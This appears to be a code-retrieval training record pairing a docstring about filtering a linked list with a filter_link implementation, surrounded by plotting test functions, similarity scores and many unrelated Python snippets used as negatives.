self.assertTrue(hasattr(splt, member[0]))\n # should *not* build header lookup table\n self.assertFalse(hasattr(splt, 'sdb'))\n # should attach axes\n self.assertTrue(isinstance(splt.ax, matplotlib.axes.Axes))", "def test_plot_lm_typeerror(models):\n idata1 = models.model_1\n with pytest.raises(TypeError):\n plot_lm(idata=idata1, y=\"y\", num_samples=-1)", "def test_plot_with_axes_or_figure(img_3d_mni):\n figure = plt.figure()\n plot_img(img_3d_mni, figure=figure)\n ax = plt.subplot(111)\n plot_img(img_3d_mni, axes=ax)\n plt.close()", "def test_plot_activation_functions():\n x = np.arange(-2, 2, 0.1)\n for 
name, f in activation_functions_dict.items():\n plt.plot(x, f(x), label=name)\n plt.title('Numpy activation functions')\n plt.legend()\n if show_plots:\n plt.show()", "def test_overplotting(self):\n arr = self.arr\n out = ternary(arr)\n self.assertTrue(hasattr(out, \"tax\"))\n out2 = ternary(arr, ax=out)\n self.assertTrue(out.tax is out2.tax) # hasn't added a new ternary axis", "def test_plot_ess_local_quantile(models, kind, kwargs):\n idata = models.model_1\n ax = plot_ess(idata, kind=kind, **kwargs)\n assert np.all(ax)", "def test_plot_mesh(self):\n plt.close('all')\n\n #\n # Initialize\n #\n fig, ax = plt.subplots(3,3)\n plot = Plot()\n #\n # Define mesh\n # \n mesh = Mesh.newmesh(grid_size=(2,2))\n mesh.refine() \n mesh.root_node().children[1,1].mark(1)\n mesh.refine(1)\n \n # Plot simple mesh\n ax[0,0] = plot.mesh(ax[0,0], mesh)\n \n #\n # Flag a few cells\n # \n mesh.unmark(nodes=True)\n mesh.root_node().children[0,0].mark(2)\n mesh.root_node().children[1,0].mark(1)\n mesh.root_node().children[1,1].children['SW'].mark(3)\n mesh.root_node().children[1,1].children['NE'].mark(3)\n \n # Color flagged cells\n ax[0,1] = plot.mesh(ax[0,1], mesh, color_marked=[1,2,3], nested=True)\n \n # Plot vertex numbers\n ax[0,2] = plot.mesh(ax[0,2], mesh, vertex_numbers=True)\n \n # Plot edge numbers\n ax[1,0] = plot.mesh(ax[1,0], mesh, edge_numbers=True)\n \n # Plot cell numbers nested off\n mesh.refine(2)\n ax[1,1] = plot.mesh(ax[1,1], mesh, cell_numbers=True)\n \n # Plot cell numbers nested on\n ax[1,2] = plot.mesh(ax[1,2], mesh, cell_numbers=True, nested=True)\n\n # Plot dofs\n element = QuadFE(2,'Q1')\n ax[2,0] = plot.mesh(ax[2,0], mesh, element=element, dofs=True)\n \n # Assign dofs in a nested way\n ax[2,1] = plot.mesh(ax[2,1], mesh, element=element, dofs=True, \\\n nested=True)\n \n # Display only dofs of flagged nodes \n ax[2,2] = plot.mesh(ax[2,2], mesh, element=element, dofs=True, \\\n node_flag=3, nested=True, show_axis=True)", "def test_exercise_2():\n dirname = os.path.dirname(os.path.realpath(__file__))\n df = pd.read_pickle(f\"{dirname}/material/data-consumption-function.pkl\")\n\n def construct_predicted_values(income, alpha, beta, gamma):\n return alpha + beta * income ** gamma\n\n mock_rslt = [-91.1933, 0.5691, 1.0204]\n income = df[\"realgdp\"].values\n df[\"realcons_pred\"] = construct_predicted_values(income, *mock_rslt)\n\n x = df.index.get_level_values(\"Year\")\n fig, ax = plt.subplots()\n ax.plot(x, df[\"realcons_pred\"], label=\"Predicted\")\n ax.plot(x, df[\"realcons\"], label=\"Observed\")", "def test_TimeSeries_repr():", "def test_get_axes():\n fig, axs = plt.subplots()\n assert all(\n isinstance(ax, mpl.axes.Axes)\n for ax in prettypyplot.tools.get_axes(axs)\n )\n assert all(\n isinstance(ax, mpl.axes.Axes)\n for ax in prettypyplot.tools.get_axes(None)\n )\n with pytest.raises(TypeError):\n prettypyplot.tools.get_axes(fig)", "def tearDown(self):\n\n self.plot = None", "def test_plt_residual_offsets():\n\n ta = WATA()\n wata_data = define_testdata()\n ta.source = ColumnDataSource(data=wata_data)\n ta.add_time_column()\n ta.setup_date_range()\n result = ta.plt_residual_offsets()\n\n assert bokeh_plot_type == type(result)" ]
[ "0.7648768", "0.75122124", "0.72958684", "0.7275574", "0.72454226", "0.7222819", "0.7141116", "0.70794994", "0.7067178", "0.70542", "0.70453763", "0.7018102", "0.70058864", "0.6963196", "0.6957051", "0.6953664", "0.6890608", "0.6844756", "0.6818328", "0.67763114", "0.67755586", "0.6773841", "0.6773796", "0.677116", "0.6737117", "0.6737117", "0.6677756", "0.66698146", "0.66398406", "0.66269505", "0.6617088", "0.661532", "0.6611782", "0.6592362", "0.65833724", "0.6566148", "0.6514988", "0.6509339", "0.64867264", "0.6482838", "0.6481102", "0.64647096", "0.6459486", "0.64285135", "0.64272666", "0.6424308", "0.64175576", "0.64130807", "0.6380469", "0.6369792", "0.63609946", "0.63561875", "0.63536805", "0.635238", "0.63503903", "0.6346156", "0.63450265", "0.63381237", "0.6327611", "0.6327401", "0.6320235", "0.63169485", "0.63132346", "0.6308366", "0.62994075", "0.6293413", "0.6291273", "0.6288597", "0.62739134", "0.6273173", "0.6269536", "0.6258541", "0.62546194", "0.6254519", "0.6243024", "0.6242218", "0.62260467", "0.62218934", "0.6213286", "0.6207692", "0.620486", "0.62044483", "0.6200011", "0.61970687", "0.61862385", "0.6184902", "0.61738515", "0.6168781", "0.6162563", "0.61517483", "0.6138071", "0.6135795", "0.6135387", "0.61316156", "0.61310554", "0.61269027", "0.6112256", "0.61096996", "0.6108132", "0.61012244" ]
0.6778257
19
Return elements e of s for which f(e) is true.
def filter_link(f, s):
    if s is Link.empty:
        return s
    else:
        filtered = filter_link(f, s.rest)
        if f(s.first):
            return Link(s.first, filtered)
        else:
            return filtered
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def selectElements(self, f, elements):\n if isinstance(elements, types.StringTypes):\n m = self.elementIndex(elements)\n return f[m]\n if elements:\n fs = []\n k = 0\n for s in elements:\n k = self.elementIndex(s)\n fs.append(f[k])\n return asarray(fs)\n else:\n return asarray(f)", "def filter(self, ffun):\n # BEGIN\n lst = []\n for item in WordSet(self.text).words():\n # if len(item) == len(ffun):\n # lst.append(item)\n if ffun(item) == True:\n lst.append(item)\n return lst\n\n # END", "def fn(p, s):\n ss = iter(s)\n return all(ch in ss for ch in p)", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n return (entry for entry in iter(self) if fn(entry))", "def subresultants(f, g):\n lev, dom, per, F, G = f.unify(g)\n R = dmp_subresultants(F, G, lev, dom)\n return map(per, R)", "def simple_filter(f, l):\n # a list comprehension with an 'if' clause goes the job nicely\n return [ item for item in l if f(item) ]", "def find(f, seq):\n for item in seq:\n if f(item): \n return item", "def find(function, iterable):\n for x in iterable:\n if function(x) == True:\n return x", "def conj(fs):\n def feature(s, i):\n return all(f(s, i) for f in fs)\n return feature", "def split_cond(f, iterable):\n split_point = [i for i, e in enumerate(iterable) if f(e)]\n split_point += [len(iterable)]\n return [iterable[i:j] for i, j in zip(split_point[:-1], split_point[1:])]", "def apply_to_all_link(f, s):\n if s == empty:\n return s\n else:\n return link(f(first(s)), apply_to_all_link(f, rest(s)))", "def simple_filter_2(f, l):\n # alternative implementation: the same as above, but without comprehension.\n filtered_l = []\n for item in l:\n if f(item):\n filtered_l.append(item)\n return filtered_l\n # I think the list comprehension is not only shorter, but also more\n # readable.", "def filter(function, iterable):\n\n if function is bool:\n return [x for x in iterable if x]\n\n return [x for x in iterable if function(x)]", "def filter_(f: Callable[[A], Maybe[bool]], iterable: Iterable[A]\n ) -> Maybe[Iterable[A]]:\n return cast(Maybe[Iterable[A]], filter_m_(Just, f, iterable))", "def s2f(sents,i,f,freq):\n return [w2f(sents,i,j,f,freq) for j in range(len(sents[i]))]", "def eval_f(f, xs):\n l = []\n for x in xs:\n l.append(f(x))\n return l", "def cfilter(func,iterable):\n result = []\n\n for i in iterable:\n\n if func(i) == True:\n result.append(i)\n\n return result", "def filtern(func: Callable, iterable: Iterable):\n return next(filter(func, iterable))", "def inverse(f):\n return lambda y: search(lambda x: f(x) == y)", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n raise NotImplementedError", "def AND(r, s):\n return lambda l, i: r(l, i) and s(l, i)", "def filter(self, op):\n def op_filter(seqs):\n r = [s for s in seqs if op(s)]\n if len(r) == 0:\n return None\n else:\n return r\n return self.element_wise(op_filter)", "def nextf(f, offset=1):\n def feature(s, i):\n i += offset\n return i < len(s) and f(s, i)\n return feature", "def f_ite(s, a, b):\n f = ITE(s, a, b).factor()\n return f if f in B else f.factor()", "def F(graph):\n return [p for p in graph if set(graph.neighbors(p)) in triads(p)]", "def satisfiesF(L):\n # Your function implementation here\n fS = []\n newL = []\n for element in L:\n fS.append(f(element))\n\n for idx in range(len(fS)):\n if not fS[idx]:\n L[idx] = '!@#'\n\n for idx in range(len(L)):\n try:\n L.remove('!@#')\n except:\n break;\n\n return len(L)", "def every(lst, fn):\n return reduce(lambda acc, 
elem: acc and fn(elem), lst, True)", "def filtered(self, func):\n return PSetList(list(filter(func, self.sets)))", "def splitCorrect(self, f):\n return self.split(lambda t,l: t.evaluateFormulaOnTrace(f)==l)", "def multi_score(self, r, s, f):\n return [None] if r is None else [0.0] if s is None else [f(x, y)\n for y in self.ensure_list(s)\n for x in self.ensure_list(r)]", "def ft_filter(fnct, tab):\n res = []\n for i in tab:\n if fnct:\n if fnct(i):\n res.append(i)\n else:\n if i:\n res.append(i)\n return res", "def filter(self, function):\n return FunctionalWrapper(filter(function, self.data))", "def my_filter(function,lst):\n return list(x for x in lst if function(x))", "def custom_filter(function, iterable):\n map_list = []\n\n for i in iterable:\n if function(i):\n map_list.append(i)\n\n return map_list", "def golden_section_search(f, a, b, n=10):\n ret = [(a,b)]\n t = (math.sqrt(5) - 1) / 2\n x1 = a + ( 1 - t ) * ( b - a )\n f1 = f(x1)\n x2 = a + t * ( b - a )\n f2 = f(x2)\n for i in range(n):\n print(\"f(x1): \" + str(f1))\n print(\"f(x2): \" + str(f2))\n if(f1 > f2):\n a = x1\n x1 = x2\n f1 = f2\n x2 = a + t*(b-a)\n f2 = f(x2)\n ret.append((a,b))\n else:\n b = x2\n x2 = x1\n f2 = f1\n x1 = a + (1-t)*(b-a)\n f1 = f(x1)\n ret.append((a,b))\n return ret", "def search(f):\n x = 0\n while not f(x):\n x += 1\n return x", "def bfs_target(graph, s, e):\n queue = [s]\n visited = [s]\n find = False\n while len(queue) > 0:\n vertex = queue.pop(0)\n nodes = graph[vertex]\n for n in nodes:\n if n not in visited:\n queue.append(n)\n visited.append(n)\n if n == e:\n find = True\n break\n if find:\n break\n return visited", "def skelmrec(f, B=None):\n from numpy import ravel\n if B is None: B = secross()\n y = binary(intersec(f, 0))\n for r in xrange(f.max(),1,-1):\n y = dilate(union(y,binary(f,r)), B)\n y = union(y, binary(f,1))\n return y", "def filter_reads(f, condition, riter):\n for r in riter:\n # TODO: looks like we don't need 'fpass'\n new_r = tuple(dict(mate, fpass=f(mate) and mate['fpass']) for mate in r)\n if condition(tuple(mate['fpass'] for mate in new_r)):\n yield new_r", "def evaluate(f, assignment):\n if 'v' in f:\n fs = f.split('v')\n return any(evaluate(f, assignment) for f in fs) \n if '&' in f:\n fs = f.replace('(','').replace(')','').split('&')\n return all(evaluate(f, assignment) for f in fs)\n if '=' in f:\n fs = f.replace('(','').replace(')','').split('=')\n evs = [evaluate(f, assignment) for f in fs]\n return all(evs) or not any(evs)\n if '>' in f:\n prefix, last = f.replace('(','').replace(')','').rsplit('>', 1)\n return not evaluate(prefix, assignment) or evaluate(last, assignment)\n if f.startswith('~'):\n return not assignment[f[1]]\n return assignment[f]", "def fancier_uniquer(seq, f, p):\n bunches = {}\n for index, item in enumerate(seq):\n marker = f(item)\n bunches.setdefault(marker, []).append((index, item))\n auxlist = [p(candidates) for candidates in bunches.values()]\n auxlist.sort()\n return [item for index, item in auxlist]", "def d2f(sents,f,freq):\n return [s2f(sents,i,f,freq) for i in range(len(sents))]", "def ea_equivalent_permutation_mappings(f, spaces=None):\n N = int(log(len(f), 2))\n mask = sum((1 << i) for i in range(0, N))\n if spaces == None:\n spaces = get_lat_zeroes_spaces(f)\n result = []\n for V in spaces:\n if thickness(V, N) == N:\n L_lut = [-1 for x in range(0, 2**N)]\n full_space = linear_span(V)\n for x in full_space:\n L_lut[x & mask] = x >> N\n if -1 in L_lut:\n raise Exception(\"Problem in EA-equivalent mapping\")\n else:\n 
result.append(\n linear_function_lut_to_matrix(L_lut).transpose()\n )\n return result", "def fval_function(sN, weight):\r\n # IMPLEMENT\r\n\r\n # Many searches will explore nodes (or states) that are ordered by their f-value.\r\n # For UCS, the fvalue is the same as the gval of the state. For best-first search, the fvalue is the hval of the state.\r\n # You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\r\n # The function must return a numeric f-value.\r\n # The value will determine your state's position on the Frontier list during a 'custom' search.\r\n # You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\r\n\r\n\r\n return (1 - weight) * sN.gval + weight * sN.hval", "def finite_difference(f, p, h):\n tweaker = FunctionTweak(f, h)\n tweaked_funcs = tweaker(np.atleast_2d(p))\n main_func = tweaked_funcs[0]\n\n def finite_func(t):\n list_of_diffs = [(tweaked_func(t) - main_func(t))/h\n for tweaked_func in tweaked_funcs[1:]]\n return np.column_stack(list_of_diffs)\n\n return finite_func", "def find(f, seq):\n for item in seq:\n if f(item): \n return item\n\n \"\"\"\n Example usage of iterate: \n >>> c = []; \\\n c.append(node(0.5,1,'a')); \\\n c.append(node(0.25,2,'b')); \\\n c.append(node(0.125,3,'c')); \\\n c.append(node(0.125,4,'d')); \\\n iterate(c) ; reportcode(c) # doctest: +NORMALIZE_WHITESPACE\n #Symbol Count Codeword\n a (0.5) 1\n b (0.25) 01\n c (0.12) 000\n d (0.12) 001\n \"\"\"", "def intersect_sets(S):\n res = S[0]\n for s in S:\n res &= s\n return res", "def __get_endpoints(self, f=None):\n if f is None:\n f = _make_callable(self.e)\n a, b = self.expr_domain\n fa, fb = f(a), f(b)\n if self.domain is not None:\n if (fb-fa) * (self.domain[1]-self.domain[0]) < 0:\n # order of values in domain is reversed w.r.t. function slope\n fa, fb = reversed(self.domain)\n else:\n fa, fb = self.domain\n return fa, fb", "def predicate(f):\n wrapper = Predicate(f)\n update_wrapper(wrapper, f)\n return wrapper", "def apply_all_link(f, s):\n assert is_link(s), 's should be a linked list'\n if s == empty:\n return s\n else:\n return link(f(first(s)), apply_all_link(f, rest(s)))", "def affine_equivalence(f, g):\n if len(f) != len(g):\n raise \"f and g are of different dimensions!\"\n table_f = defaultdict(list)\n table_c = defaultdict(int)\n for c in range(0, len(f)):\n f_c = le_class_representative([oplus(f[x], c) for x in range(0, len(f))])\n d = hash_sbox(f_c)\n table_f[d] = f_c\n table_c[d] = c\n rs = []\n a = -1\n b = -1 \n for c in range(0, len(f)):\n g_c = le_class_representative([g[oplus(x, c)] for x in range(0, len(f))])\n d = hash_sbox(g_c)\n if d in table_c.keys():\n a = c\n b = table_c[d]\n rs = g_c\n break\n if a == -1:\n return []\n l_f = linear_equivalence([oplus(f[x], b) for x in range(0, len(f))],\n rs)\n A_f, B_f = l_f[0], l_f[1]\n l_g = linear_equivalence([g[oplus(x, a)] for x in range(0, len(f))],\n rs)\n A_g, B_g = l_g[0], l_g[1]\n A = A_g.inverse() * A_f\n B = B_f * B_g.inverse()\n a = apply_bin_mat(a, A.inverse())\n return [A, a, B, b]", "def sqf_list_include(f, all=False):\n factors = dmp_sqf_list_include(f.rep, f.lev, f.dom, all=all)\n return [ (f.per(g), k) for g, k in factors ]", "def fval_function(sN, weight):\n#IMPLEMENT\n \n #Many searches will explore nodes (or states) that are ordered by their f-value.\n #For UCS, the fvalue is the same as the gval of the state. 
For best-first search, the fvalue is the hval of the state.\n #You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\n #The function must return a numeric f-value.\n #The value will determine your state's position on the Frontier list during a 'custom' search.\n #You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\n return 0", "def greedy_schedule(s, f, verbose=False):\n X = [False for p in range(n)]\n a = [(s[i], f[i]) for i in range(n)]\n count = 1\n X[count] = 1\n for i in range(2, n):\n if s[i] > f[X[count]]:\n count += 1\n X[count] = i\n\n \"\"\"after this loop, an entry in X will contain either the start time\n of a task (denoting that we should use it) or it will contain False,\n denoting that we should skip it.\"\"\"\n if verbose:\n set_of_classes = set([])\n for item in X:\n if item:\n set_of_classes.add(item)\n print set_of_classes", "def sqf_part(f):\n return f.per(dmp_sqf_part(f.rep, f.lev, f.dom))", "def mapf( f, C ):\n return (f(x) for x in C)", "def solution(s):", "def filter(self, func):\r\n\r\n d = self.data\r\n f = []\r\n for i in d:\r\n if func(i):\r\n f.append(i)\r\n return Records(f)", "def extract_strings(f):\n strings = re.findall(strregex,f)\n return strings", "def ft_filter(function_to_apply, list_of_inputs):\n if not callable(function_to_apply):\n exit(\"First param should be a Function\")\n try:\n object_iter = iter(list_of_inputs)\n except TypeError:\n exit(\"Second Argument must be iterable\")\n lst = []\n for item in list_of_inputs:\n if function_to_apply(item) == True: \n lst.append(item)\n return lst", "def filter(iteratee, seq):\n return _filter(fnc.iteratee(iteratee), seq)", "def get_paths_for_flow(F, s, f):\n links = [((u, v), split_ratio) \n for (flow_id, u, v), split_ratio in F.items() \n if flow_id == f and u == s and split_ratio > 0.001]\n return links", "def get_paths_for_flow(F, s, f):\n links = [((u, v), split_ratio) \n for (flow_id, u, v), split_ratio in F.items() \n if flow_id == f and u == s and split_ratio > 0.001]\n return links", "def brute_force_search(f, fp_factors, q):\n factors = []\n d, r = 1, len(fp_factors)\n while 2*d <= r:\n found, combination = find_combination(f, d, fp_factors, q)\n if found:\n factors.append(found)\n for picked in combination:\n fp_factors.remove(picked)\n f = f.pseudo_floordiv(found).primitive_part()\n r -= d\n else:\n d += 1\n factors.append(f.primitive_part())\n return factors", "def keep_if_link(f, s):\n assert is_link(s)\n if s == empty:\n return s\n else:\n kept = keep_if_link(f, rest(s))\n if f(first(s)):\n return link(first(s), kept)\n else:\n return kept", "def algo_4_3(sf,FV):\n F = set()\n V = FV.keys()\n \n for s in sf:\n if isVariable(s, V):\n if EMPTY_SYMBOL_UNI in FV[s]:\n F |= (FV[s]- set([EMPTY_SYMBOL_UNI]))\n else:\n F |= FV[s]\n break\n else:\n assert s[0] == s[-1]\n assert s[0] == \"'\" or s[0] == '\"'\n\n s = s[1:-1] #字面量 去除引号\n F.add(s[0]) #取第一个符号作为首终结符\n break\n return F", "def filter(self, func: Callable[[T], bool]) -> 'List[T]':\n return [v for v in self.array if func(v)]", "def filter_list(f):\n\n def new_function(*args: Union[List[Tuple[str, bool]], Any], **kwargs: Any):\n try:\n return '\\n'.join([file for file, is_saved in\n {k: v for d in f(*args, **kwargs)\n for k, v in d.items()}.items() if not is_saved])\n except AttributeError:\n return ''\n\n return new_function", "def keep_if_link(f, s):\n assert is_link(s)\n if s == empty:\n return s\n else:\n kept = 
keep_if_link(f, rest(s))\n if f(first(s)):\n return link(first(s), kept)\n else:\n return kept", "def keep_if_link(f, s):\n assert is_link(s)\n if s == empty:\n return s\n else:\n kept = keep_if_link(f, rest(s))\n if f(first(s)):\n return link(first(s), kept)\n else:\n return kept", "def filter(self, func=bool):\n return _(filter(func, self._))", "def sub(f, g):\n lev, dom, per, F, G = f.unify(g)\n return per(dmp_sub(F, G, lev, dom))", "def filter(self, func):\n self._sets.filter(key=func)", "def find(iteratee, seq):\n for item in filter(iteratee, seq):\n return item", "def zzX_eval_list(f, A):\n def rec_eval(g, l, L):\n if l == L:\n return zzx_eval(g, A[-1])\n else:\n h = [ rec_eval(h, l+1, L) for h in g ]\n\n if l <= L - len(A):\n return h\n else:\n return zzx_eval(h, A[-L+l-1])\n\n if not A:\n return f\n\n L = poly_level(f)\n\n if zzX_zero_p(f):\n return zzX_zero(L - len(A))\n\n e = rec_eval(f, 1, L)\n\n if L == len(A):\n return e\n else:\n return zzX_strip(e)", "def shear_tensor(self, f):\n shear = self.einsum(\"qa,qb->qab\", [self.e, self.e])\n shear = self.einsum(\"q,qab->ab\", [f, shear])\n return shear", "def filter(self, fn):\r\n\t\treturn FilterProjectedList(self, [fn])", "def resultant(f, g):\n lev, dom, per, F, G = f.unify(g)\n return per(dmp_resultant(F, G, lev, dom), lower=True)", "def eval(f, a, j=0):\n return f.per(dmp_eval_in(f.rep, f.dom.convert(a), j, f.lev, f.dom), lower=True)", "def local_func(f, t, x, w):\n x_func = np.zeros_like(t, dtype='f')\n for i, jd in enumerate(t.jd):\n sel = (t.jd >= (jd - w)) & (t.jd <= (jd + w))\n x_func[i] = f(x[sel])\n return x_func", "def get_inner_quantifiers(f):\n inner = f\n while is_quantifier(inner.root):\n quantifiers.append((inner.root, inner.variable))\n inner = inner.predicate\n return inner", "def selectSpecies(self, f, species):\n\n if isinstance(species, types.StringTypes):\n k = self.speciesIndex(species)\n return f[k]\n elif species:\n fs = []\n k = 0\n for s in species:\n k = self.speciesIndex(s)\n fs.append(f[k])\n return asarray(fs)\n else:\n return asarray(f)", "def accessible(g, s):\n\tacc = set()\n\tacc.add(s)\n\tlist = [s]\n\twhile len(list) > 0:\n\t\tx = list[0]\n\t\tlist = list[1 : ]\n\t\tfor y in g.parseNout(x):\n\t\t\tif y not in acc:\n\t\t\t\tacc.add(y)\n\t\t\t\tlist.append(y)\n\treturn acc", "def LineSearchXS(F, x, s, dx, ds, L, U, iterates):\n \n L_val = F(x + dx * L, s + ds * L)\n U_val = F(x + dx * U, s + ds * U)\n \n if iterates <= 0:\n if L_val < U_val:\n return L\n else:\n return U\n \n \n if L_val < U_val:\n return LineSearchXS(F, x, s, dx, ds, L, (U + L) / 2, iterates - 1)\n else:\n \treturn LineSearchXS(F, x, s, dx, ds, (U + L) / 2, U, iterates - 1)", "def filter(s, F, dt, nf):\n S = np.fft.fft(s, n=nf)\n S_f = np.multiply(S, F)*dt\n s_f = np.real(np.fft.ifft(S_f, n=nf))\n return s_f", "def f2E(f):\n E=c['h']*f*u['eV']\n return E", "def get_bfs(self, s):\n # create a queue for BFS\n queue = []\n # mark all the vertices as not visited\n visited = [False] * (len(self.graph))\n # mark the start node as visited and enqueue it\n visited[s] = True\n queue.append(s)\n results = []\n\n while queue:\n # dequeue a vertex from queue and append to results.\n p = queue.pop(0)\n results.append(p)\n # get all adjacent vertices of the dequeued vertex s,\n # and for any unvisited adjacent, mark it visited and enqueue it.\n for v in self.graph[p]:\n if visited[v] is False:\n visited[v] = True\n queue.append(v)\n\n return results", "def satisfiesF(L):\n # Your function implementation here\n i = 0\n while i < len(L):\n if 
not f(L[i]):\n L.remove(L[i])\n else:\n i += 1\n return len(L)", "def x(self, s, f):\n return self._x_rasters[s][f]", "def skelm(f, B=None, option=\"binary\"):\n from string import upper\n from numpy import asarray\n if B is None: B = secross()\n assert isbinary(f),'Input binary image only'\n option = upper(option)\n k1,k2 = limits(f)\n y = gray(intersec(f, k1),'uint16')\n iszero = asarray(y)\n nb = sesum(B,0)\n for r in xrange(1,65535):\n ero = erode(f,nb)\n if isequal(ero, iszero): break\n f1 = openth( ero, B)\n nb = sedilate(nb, B)\n y = union(y, gray(f1,'uint16',r))\n if option == 'BINARY':\n y = binary(y)\n return y", "def friend(x):\n return [f for f in x if len(f) == 4]", "def all_terms(f):\n return dmp_all_terms(f.rep, f.lev, f.dom)", "def zzX_content(f):\n cont = poly_LC(f)\n\n for g in f[1:]:\n cont = zzX_gcd(cont, g)\n\n if zzX_one_p(cont):\n break\n\n return cont", "def _extract_feature(self,f):\n if callable(f): \n return f()\n elif type(f) == tuple:\n return f[0](*list(f[1:]))", "def find_all(s, t):\n offset = 0\n starts = []\n start = s.find(t, offset)\n while start != -1:\n starts.append(start + 1) # Uses one-based indexing, as Pfam does.\n offset = start + 1\n start = s.find(t, offset)\n return starts", "def zassenhaus(f):\n # keep leading coefficient\n lf = f.leading_coefficient()\n\n # p-adic factorization\n p, fp_factors = padic_factorization(f)\n if len(fp_factors) == 1:\n return [f]\n\n # purge leading coefficient from factors\n for i,g in enumerate(fp_factors):\n if g.degree() == 0:\n del fp_factors[i]\n break\n\n # lift to Mignotte bound\n blm = upper_bound_of_coefficient(f)\n bound = p**(arith1.log(2*blm,p)+1)\n\n # Hensel lifting\n lf_inv_modq = intresidue.IntegerResidueClass(lf, bound).inverse()\n fq = f.coefficients_map(lambda c: (lf_inv_modq*c).minimumAbsolute()) # fq is monic\n fq_factors, q = hensel.lift_upto(fq, fp_factors, p, bound)\n\n return brute_force_search(f, fq_factors, bound)", "def test_f_uni(self):\n s = np.array([100.0, 0, 0, 0, 0, 0])\n e = np.array([0.1, -0.05, -0.05, 0, 0, 0])\n f_direct = self.model.f(s, e, self.t, self.T)\n \n sdev = s - np.array([1,1,1,0,0,0]) * np.sum(s[:3]) / 3.0\n se = np.sqrt(3.0/2.0) * la.norm(sdev)\n ee = np.sqrt(2.0/3.0) * la.norm(e)\n\n g_direct = self.smodel.g(se, ee, self.t, self.T)\n \n self.assertTrue(np.isclose(g_direct, f_direct[0]))\n\n self.assertTrue(np.isclose(-g_direct/2.0, f_direct[1]))\n self.assertTrue(np.isclose(-g_direct/2.0, f_direct[2]))\n\n self.assertTrue(np.allclose([0,0,0], f_direct[3:]))", "def parse_steer_functions(sf: str) -> [int]:\n total = len(steer_functions)\n sf = sf.replace(' ', '')\n if sf == '' or sf.lower() == \"all\":\n return list(range(total))\n\n def parse_int(s: str):\n return (int(s) + total) % total\n\n sfs = []\n rs = [s.strip() for s in sf.split(',')]\n for r in rs:\n if ':' in r:\n ri = r.index(':')\n start = 0 if ri == 0 else parse_int(r[:ri])\n end = total if ri == len(r) - 1 else parse_int(r[(ri + 1):])\n sfs += list(range(start, end))\n elif is_int(r):\n sfs.append(parse_int(r))\n elif r in steer_functions:\n sfs.append(steer_functions.index(r))\n else:\n click.echo('Substring \"%s\" could not identify a steer function.' %\n r,\n err=True)\n return sfs", "def generate_boolean_vector(f,q,r,DIMS):\n b = None\n for i in range(DIMS):\n if b is None:\n b = (f[:,i]<q[i]+r[i]) & (f[:,i]>q[i])\n else :\n b = b & (f[:,i]<q[i]+r[i]) & (f[:,i]>q[i])\n return b", "def sum_f(f, xs):\n sum = 0\n for x in xs:\n sum += f(x)\n return sum" ]
[ "0.58423346", "0.57762986", "0.572943", "0.56309384", "0.55529606", "0.554871", "0.5516751", "0.54883784", "0.5471321", "0.54678047", "0.54397553", "0.5426767", "0.54211754", "0.5374095", "0.5334541", "0.5296604", "0.5284521", "0.52649575", "0.52402025", "0.51693165", "0.51681167", "0.51127696", "0.51010865", "0.508186", "0.50750256", "0.5045613", "0.5027764", "0.5015021", "0.49996114", "0.49988872", "0.49974734", "0.49973333", "0.49705467", "0.4960215", "0.49399483", "0.4925519", "0.49251226", "0.49166805", "0.49038088", "0.48828644", "0.48750362", "0.48631313", "0.4863005", "0.4851726", "0.4843953", "0.4828023", "0.4822656", "0.48117152", "0.48110113", "0.48029268", "0.47947344", "0.47916597", "0.4789531", "0.47883272", "0.47873354", "0.47841272", "0.47744164", "0.47742698", "0.4767963", "0.47574127", "0.47358197", "0.4734498", "0.4734498", "0.47333366", "0.47197208", "0.47193193", "0.47153068", "0.47017804", "0.4689849", "0.4689849", "0.46797246", "0.4672469", "0.46671268", "0.46588048", "0.4655471", "0.46300417", "0.46252048", "0.4621823", "0.46165308", "0.46150807", "0.45934808", "0.4593357", "0.45904583", "0.45881528", "0.4584776", "0.4580219", "0.45791975", "0.45750624", "0.45741037", "0.45734304", "0.45564643", "0.455231", "0.45510522", "0.45459852", "0.45455006", "0.45418242", "0.45359215", "0.4527417", "0.4526426", "0.45245284" ]
0.5204124
19
Return true if set s contains value v as an element. >>> s = Link(1, Link(3, Link(2))) >>> contains(s, 2) True >>> contains(s, 4) False
def contains(s, v): head = s while not empty(head): if head.first == v: return True head = head.rest return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __contains__(self, v):\n for i in self:\n if v in i:\n return True\n False", "def contains(s, v):\n if empty(s):\n return False\n elif s.first == v:\n return True\n else:\n return contains(s.rest, v)", "def has(self, v):\n return v in self.values", "def __contains__(self, x):\n return x in (v for v, _ in self)", "def __contains__(self, x):\n return x in (v for v, _ in self)", "def test_contains(self):\n s = djset()\n s.add([1, 2, 3])\n s.add([4, 5, 6])\n self.assertTrue(2 in s)\n self.assertTrue(5 in s)", "def contains(self, val):\n\t\treturn Contains(self, val)", "def contains(self, value):\n if self.graph == None:\n return\n \n else:\n return contain(self.graph, value)", "def __contains__(self, vector: Vector) -> bool:\n for vec in self.__elements:\n if vec == vector:\n return True\n return False", "def contains(self, value):\n return value in self.values", "def contains(self, value):\n if self.root is None:\n return False\n return self.root.contains(value)", "def __contains__(self, n):\n try:\n return n in self.node\n except TypeError:\n return False", "def __contains__(self, elem):\n return elem in list(self)", "def contains(self, vertex):\n return vertex in self._graph", "def _contains(self, element):\n if not isinstance(element, Tuple) or len(element) != 2:\n return S.false\n\n if not element[1].is_Integer:\n return S.false\n\n if element[1] >= len(self.sets) or element[1] < 0:\n return S.false\n\n return self.sets[element[1]]._contains(element[0])", "def __contains__(self, item): # __iter__ would do this job by itself\n return (item in self.__values)", "def __contains__(self, item):\n cur_node = self.head\n while cur_node is not None:\n if item in cur_node.data_list:\n return True\n else:\n cur_node = cur_node.next_node\n\n return False", "def contains(self, key):\n index = self.key_to_index(key)\n node = self.hash_set[index]\n\n while node:\n if node.key == key:\n return True\n\n node = node.next\n\n return False", "def contains(self, x: object):\n return x in self.items", "def __contains__(self, item):\n return item in self.__keys or item in self.__vals", "def __contains__(self, item):\n\t\treturn item in self.__dict__.values()", 